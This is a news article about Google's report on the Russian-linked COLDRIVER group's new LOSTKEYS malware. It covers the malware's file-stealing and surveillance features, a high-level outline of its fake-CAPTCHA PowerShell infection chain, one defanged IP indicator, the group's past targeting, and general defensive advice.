Russian-Backed Hacker Group COLDRIVER Deploys New Malware Targeting Western Entities

On May 7, 2025, Google’s Threat Intelligence team reported that COLDRIVER, a Russian-backed cyber espionage group, has developed a new malware strain named “LOSTKEYS.” This malware signifies a shift from the group’s traditional phishing tactics to more advanced cyber attacks.

Key Features of LOSTKEYS Malware:

Data Exfiltration: LOSTKEYS is designed to steal files from specific extensions and directories on infected systems.

System Surveillance: The malware collects detailed system information and monitors running processes, transmitting this data back to COLDRIVER’s servers.

Sophisticated Deployment:

A lure website presents a fake CAPTCHA to the user.

A PowerShell script is downloaded to the user’s clipboard.

The script executes, retrieving the final payload.

The malware is installed on the system.

Google has identified the IP address “165.227.148[.]68” as associated with this malicious activity. In response, the company has added related malicious websites to its Safe Browsing feature to protect users.

Background on COLDRIVER:
COLDRIVER, also known by aliases such as Blue Callisto, BlueCharlie, and Star Blizzard, has been active since at least 2019. The group is linked to Russia’s Federal Security Service and is known for targeting high-profile Western individuals and organizations, including NATO affiliates, NGOs, and journalists. Their operations primarily focus on intelligence gathering to support Russian strategic interests.

In early 2025, COLDRIVER targeted advisors to Western governments, military personnel, and individuals connected to Ukraine. In 2022, the group breached three U.S. nuclear research labs and leaked emails from former British intelligence chief Richard Dearlove and pro-Brexit figures.

Implications:
The emergence of LOSTKEYS underscores the evolving threat landscape posed by state-sponsored cyber actors. Organizations, especially in governmental and non-governmental sectors, are advised to enhance cybersecurity measures, remain vigilant against phishing attempts, and keep systems updated to mitigate potential vulnerabilities.